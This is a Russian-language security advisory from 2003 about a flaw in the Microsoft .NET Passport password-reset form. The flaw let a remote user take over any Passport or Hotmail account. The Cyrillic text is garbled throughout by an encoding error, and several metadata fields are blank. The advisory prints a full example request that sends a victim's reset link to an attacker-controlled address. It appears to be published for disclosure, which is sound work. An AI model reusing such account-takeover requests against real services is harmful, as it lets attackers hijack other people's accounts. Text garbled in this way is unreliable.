»зменение паролей пользователей Microsoft .NET Passport

ƒата публикации:
12.05.2003
¬сего просмотров:
2100
ќпасность:
Ќаличие исправлени€:
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
¬оздействие:
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
ќписание: ”€звимость обнаружена в Microsoft .NET Passport, котора€ также воздействует на учетные записи Hotmail. ”даленный пользователь может изменить пароль произвольного пользовател€ и получить доступ к целевой учетной записи пользовател€.

—ообщаетс€, что удаленный пользователь может использовать форму сброса парол€ .NET Passport, чтобы изменить пароль произвольного пользовател€. ѕример:

https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1
”даленный пользователь (attacker@attacker.com) получит почтовое сообщение от .NET Passport сервера, в котором содержитс€ URL дл€ изменени€ парол€. ‘орма не требует ввода предыдущего парол€.

—сылки: Hotmail & Passport (.NET Accounts) Vulnerability
или введите им€

CAPTCHA